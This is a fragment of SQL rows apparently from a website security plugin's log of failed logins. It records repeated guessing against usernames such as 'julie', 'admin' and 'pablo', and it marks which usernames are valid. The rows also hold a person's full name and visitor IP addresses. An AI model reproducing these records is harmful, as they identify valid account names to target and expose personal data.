(100188, 1494666853.141493, 1, 'loginFailValidUsername', 'julie', 2, 2702591917, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/530.68.15 (KHTML, like Gecko) Chrome/55.1.5666.0394 Safari/532.07 OPR/41.9.4844.9571'),
(100187, 1494660793.249378, 1, 'loginFailValidUsername', 'julie', 2, 1053888074, 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.50.03) Gecko/20162759 Firefox/52.50.03'),
(100186, 1494654542.901665, 1, 'loginFailValidUsername', 'julie', 2, 1988657426, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.86.34 (KHTML, like Gecko) Version/5.2.7 Safari/530.69'),
(100185, 1494648617.618271, 1, 'loginFailValidUsername', 'admin', 1, 3110719547, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100184, 1494648616.790860, 1, 'loginFailValidUsername', 'pablo', 3, 3110719547, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100183, 1494648615.959000, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 3110719547, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100182, 1494648615.128006, 1, 'loginFailValidUsername', 'julie', 2, 3110719547, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100181, 1494648614.286757, 1, 'loginFailValidUsername', 'julie', 2, 3110719547, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100180, 1494635301.528715, 1, 'loginFailValidUsername', 'julie', 2, 534272049, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.12.65 (KHTML, like Gecko) Version/4.7.2 Safari/533.20'),
(100179, 1494629134.785519, 1, 'loginFailValidUsername', 'julie', 2, 1504792371, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.96.43 (KHTML, like Gecko) Version/5.3.8 Safari/531.78'),
(100178, 1494623145.173181, 1, 'loginFailValidUsername', 'julie', 2, 2957671696, 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/534.17.54 (KHTML, like Gecko) Chrome/57.5.0529.5257 Safari/534.47'),
(100177, 1494617220.306213, 1, 'loginFailValidUsername', 'julie', 2, 2631131026, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_44_97) AppleWebKit/533.03.56 (KHTML, like Gecko) Chrome/57.5.1558.6820 Safari/530.64 Edge/34.79094'),
(100176, 1494611437.398820, 1, 'loginFailValidUsername', 'julie', 2, 3080560693, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.89.36 (KHTML, like Gecko) Version/5.2.7 Safari/530.72'),
(100175, 1494605639.285777, 1, 'loginFailValidUsername', 'julie', 2, 1600851472, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_35_88) AppleWebKit/532.84.47 (KHTML, like Gecko) Chrome/57.4.9643.4915 Safari/534.55'),
(100174, 1494603905.970381, 1, 'loginFailInvalidUsername', 'administrator', 0, 1728585030, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100173, 1494599743.684859, 1, 'loginFailValidUsername', 'julie', 2, 3719344542, 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_48_01) AppleWebKit/533.07.50 (KHTML, like Gecko) Chrome/53.6.1896.6168 Safari/530.77 Edge/34.73473'),
(100172, 1494597023.747279, 1, 'loginFailInvalidUsername', 'admin@pour', 0, 1119841390, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100171, 1494596451.173248, 1, 'loginFailInvalidUsername', 'manager', 0, 3116589525, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100170, 1494596017.189806, 1, 'loginFailInvalidUsername', 'manager', 0, 794439728, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100169, 1494593757.824835, 1, 'loginFailValidUsername', 'julie', 2, 1868455274, 'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/533.96.49 (KHTML, like Gecko) Chrome/57.5.0875.5147 Safari/530.67 OPR/40.6.1698.7960'),
(100168, 1494587752.984324, 1, 'loginFailValidUsername', 'julie', 2, 657485531, 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/535.26.79 (KHTML, like Gecko) Chrome/53.7.3890.8062 Safari/531.86'),
(100167, 1494581627.202608, 1, 'loginFailValidUsername', 'julie', 2, 823085059, 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_45_08) AppleWebKit/533.04.57 (KHTML, like Gecko) Chrome/53.6.1576.6838 Safari/530.74 Edge/34.70175'),
(100166, 1494575447.635802, 1, 'loginFailValidUsername', 'julie', 2, 2033593486, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.18.65 (KHTML, like Gecko) Chrome/53.6.1688.5316 Safari/534.57'),
(100165, 1494562854.225601, 1, 'loginFailValidUsername', 'julie', 2, 20576305, 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.56.19) Gecko/20167903 Firefox/52.56.19'),
(100164, 1494556331.000937, 1, 'loginFailValidUsername', 'julie', 2, 700293937, 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.58.01) Gecko/20160334 Firefox/52.58.01'),
(100163, 1494549839.527500, 1, 'loginFailValidUsername', 'julie', 2, 1440508634, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/531.87.30 (KHTML, like Gecko) Chrome/56.3.9890.4162 Safari/534.47 OPR/44.5.0613.5985'),
(99352, 1492929661.656740, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 1534660767, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99353, 1492929662.304351, 1, 'loginFailValidUsername', 'pablo', 3, 1534660767, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99354, 1492929662.987883, 1, 'loginFailValidUsername', 'admin', 1, 1534660767, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99355, 1492933329.938497, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3753785098, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99356, 1492933331.330627, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3753785098, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99357, 1492940466.562234, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 411503849, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99358, 1492940468.372584, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 411503849, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99359, 1492940902.484091, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3032445579, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99360, 1492940904.189857, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3032445579, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99361, 1492949241.104111, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2094356282, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99362, 1492949242.606022, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2094356282, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99363, 1492951040.131085, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3136393096, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99364, 1492951041.839434, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3136393096, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99365, 1492952998.637411, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1300185300, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99366, 1492956613.050558, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 771231821, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99367, 1492956614.304557, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 771231821, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99368, 1492957583.809696, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 973646844, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99369, 1492959293.675682, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1538676748, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99370, 1492959294.683327, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1538676748, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99371, 1492959318.529929, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2599704618, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99372, 1492959320.703201, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2599704618, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99373, 1492959490.353820, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 781729123, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99374, 1492959491.622306, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 781729123, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99375, 1492963893.909202, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 18314902, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99376, 1492963895.390585, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 18314902, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99377, 1492966940.028683, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1868055168, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99378, 1492966942.046357, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1868055168, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99379, 1492967960.218853, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3126433090, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99380, 1492967961.637935, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3126433090, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99381, 1492968528.477499, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1384290088, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99382, 1492968529.503829, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1384290088, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99383, 1492969852.166549, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1506639269, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99384, 1492969853.292732, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1506639269, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99385, 1492975214.885623, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3039906593, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99386, 1492975219.519800, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3039906593, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99387, 1492977408.666205, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2630622701, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99388, 1492977409.802242, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2630622701, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99389, 1492981066.193661, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3197692239, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99390, 1492981067.580630, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3197692239, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99391, 1492992617.132618, 1, 'loginFailValidUsername', 'julie', 2, 2111108014, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99392, 1492992619.698563, 1, 'loginFailValidUsername', 'julie', 2, 2111108014, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99393, 1492992621.928154, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 2111108014, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99394, 1492992623.898700, 1, 'loginFailValidUsername', 'pablo', 3, 2111108014, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99395, 1492992625.764211, 1, 'loginFailValidUsername', 'admin', 1, 2111108014, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99396, 1492994207.076557, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 694229235, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99397, 1493000029.583305, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3149830434, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99398, 1493004981.394282, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2991539866, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99399, 1493004982.569906, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2991539866, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99400, 1493008549.195892, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1840211296, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99401, 1493008550.257095, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1840211296, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99402, 1493015499.474278, 1, 'loginFailValidUsername', 'julie', 2, 2057029096, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99403, 1493021883.348600, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2979775226, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99404, 1493021885.827401, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2979775226, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99405, 1493026018.364045, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1096748134, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99406, 1493026019.476796, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1096748134, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99407, 1493026366.748639, 1, 'loginFailValidUsername', 'julie', 2, 1599408102, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99408, 1493026367.459888, 1, 'loginFailValidUsername', 'julie', 2, 1599408102, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99409, 1493026368.162904, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 1599408102, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99410, 1493026368.873318, 1, 'loginFailValidUsername', 'pablo', 3, 1599408102, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99411, 1493026369.805710, 1, 'loginFailValidUsername', 'admin', 1, 1599408102, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99412, 1493026796.599304, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3065733296, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99413, 1493026798.131065, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3065733296, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99414, 1493034743.830183, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3058341779, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99415, 1493034745.090619, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3058341779, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99416, 1493036722.247440, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 837089132, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99417, 1493038680.089695, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3017243651, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99418, 1493038681.541839, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3017243651, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99419, 1493043124.835329, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3397505593, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99420, 1493043126.061219, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3397505593, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99421, 1493044966.067198, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2167236030, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99422, 1493044967.409999, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2167236030, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99423, 1493046341.813760, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1741612838, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99424, 1493046343.679322, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1741612838, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99425, 1493051120.610123, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1835651189, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99426, 1493051121.754831, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1835651189, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99427, 1493053170.672976, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892753981, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99428, 1493055055.130241, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1484515861, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99429, 1493056021.877526, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3419896414, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99430, 1493056023.858472, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3419896414, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99431, 1493056341.385848, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2994214105, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99432, 1493056342.732522, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2994214105, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99433, 1493056490.171516, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1500726576, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99434, 1493056491.222566, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1500726576, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99435, 1493057105.120875, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1242501469, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99436, 1493057134.751530, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1476077362, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99437, 1493057138.552144, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1476077362, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99438, 1493057139.902494, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1459691243, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99439, 1493058050.769749, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1833903990, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99440, 1493058051.976170, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1833903990, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99441, 1493058494.207632, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1222315437, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99442, 1493058495.433444, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1222315437, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99443, 1493062747.172440, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657929581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99444, 1493062748.524406, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657929581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99445, 1493065916.418847, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3057735558, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99446, 1493065918.337474, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3057735558, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99447, 1493066313.614563, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657352762, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99448, 1493066315.041927, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657352762, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99449, 1493068009.075598, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1837181866, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99450, 1493071366.572061, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3735426338, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99451, 1493071368.112384, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3735426338, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99452, 1493071787.802028, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1473126706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99453, 1493075786.368938, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 86724239, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99454, 1493079982.264612, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 842254621, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99455, 1493085701.240804, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2320235926, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99456, 1493086694.375248, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3579766044, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99457, 1493086695.473861, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3579766044, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99458, 1493087412.114776, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2399207350, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99459, 1493087466.716597, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2637388761, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99460, 1493087945.830591, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3754818252, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99461, 1493098899.974467, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1741772220, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
